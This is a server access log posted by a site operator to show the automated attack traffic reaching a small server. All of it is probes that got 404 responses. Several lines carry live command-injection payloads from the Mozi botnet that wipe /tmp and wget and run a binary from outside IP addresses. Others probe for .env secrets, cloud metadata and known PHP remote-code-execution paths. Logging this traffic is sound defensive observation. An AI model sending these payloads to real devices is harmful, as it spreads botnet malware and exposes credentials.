Taken from the logs the PM2 server, but 'grep -v' of legitimate requests.  This might become a blog post, just to show the random requests floating around the interwebs.

2021-04-25T10:19:17: GET /mysql/index.php?lang=en 404 0.940 ms - 1103
2021-04-25T10:21:27: GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.36.40.208:44947/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.964 ms - 1103
2021-04-25T11:17:53: GET http://169.254.169.254/latest/meta-data/ 404 1.033 ms - 1103
2021-04-25T11:49:04: POST /HNAP1/ 404 0.837 ms - 1103
2021-04-25T13:25:39: GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.50.19.46:34602/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.952 ms - 1103
2021-04-25T14:57:06: GET /.env 404 0.919 ms - 1103
2021-04-25T14:57:07: POST / 404 1.048 ms - 1103
2021-04-25T17:00:00: POST http://likeapro.best/e575cd98625600470d1104fc72f80a87f730f05286e51cdb6c05273404dc0aae739d0db7277b71e1ecb3b20660adaf99af2cc38a73607e29a8c2e5f13b094eb92b8a3b2210eda0abd8b2f05ae189f645711206c39362e7264ad800160b2e02b8 404 1.266 ms - 1103
2021-04-25T18:04:09: GET /config/getuser?index=0 404 0.940 ms - 1103
2021-04-25T20:12:45: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 1.083 ms - 1103
2021-04-25T20:12:45: POST /api/jsonws/invoke 404 0.656 ms - 1103
2021-04-25T20:12:45: GET /solr/admin/info/system?wt=json 404 0.989 ms - 1103
2021-04-25T20:12:45: GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 1.320 ms - 1103
2021-04-25T20:12:45: GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404 0.918 ms - 1103
2021-04-25T20:12:45: GET /wp-content/plugins/wp-file-manager/readme.txt 404 0.866 ms - 1103
2021-04-25T20:12:46: POST /Autodiscover/Autodiscover.xml 404 1.512 ms - 1103
2021-04-25T20:12:46: GET /console/ 404 0.771 ms - 1103
2021-04-25T20:12:46: GET /_ignition/execute-solution 404 0.936 ms - 1103
2021-04-25T22:00:03: GET /.env 404 4.342 ms - 1103
2021-04-25T22:00:04: POST / 404 0.994 ms - 1103
2021-04-26T01:25:09: POST /HNAP1/ 404 0.852 ms - 1103
2021-04-26T01:58:50: POST /HNAP1/ 404 0.818 ms - 1103
2021-04-26T02:08:22: GET /.env 404 1.187 ms - 1103
2021-04-26T02:08:22: POST / 404 1.218 ms - 1103
2021-04-26T05:19:35: GET /_ignition/execute-solution 404 0.969 ms - 1103
2021-04-26T05:49:31: POST /HNAP1/ 404 0.913 ms - 1103
2021-04-26T06:08:45: POST /GponForm/diag_Form?images/ 404 0.736 ms - 1103
2021-04-26T07:55:52: GET /.env 404 0.843 ms - 1103
2021-04-26T07:55:52: POST / 404 0.835 ms - 1103
2021-04-26T08:23:47: POST /HNAP1/ 404 0.804 ms - 1103
2021-04-26T10:42:36: GET /laravel/.env 404 0.658 ms - 1103
2021-04-26T10:42:36: GET /app/.env 404 0.619 ms - 1103
2021-04-26T10:42:36: GET /application/configs/application.ini 404 0.712 ms - 1103
2021-04-26T10:42:36: GET /application/application.ini 404 0.656 ms - 1103
2021-04-26T10:42:36: GET /vendor/laravel/.env 404 0.641 ms - 1103
2021-04-26T10:42:36: GET /wp-content/uploads/wc-logs/ 404 0.677 ms - 1103
2021-04-26T11:38:52: POST /Autodiscover/Autodiscover.xml 404 0.836 ms - 1103
2021-04-26T11:38:52: GET /console/ 404 0.711 ms - 1103
2021-04-26T11:38:53: GET /_ignition/execute-solution 404 1.475 ms - 1103
2021-04-26T11:38:53: GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 0.954 ms - 1103
2021-04-26T11:38:53: GET /solr/admin/info/system?wt=json 404 0.934 ms - 1103
2021-04-26T11:38:54: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 1.006 ms - 1103
2021-04-26T11:38:54: GET /wp-content/plugins/wp-file-manager/readme.txt 404 0.944 ms - 1103
2021-04-26T11:38:54: POST /api/jsonws/invoke 404 0.926 ms - 1103
2021-04-26T11:38:55: GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404 0.870 ms - 1103
2021-04-26T16:41:52: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://58.248.142.207:49791/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 404 0.969 ms - 1103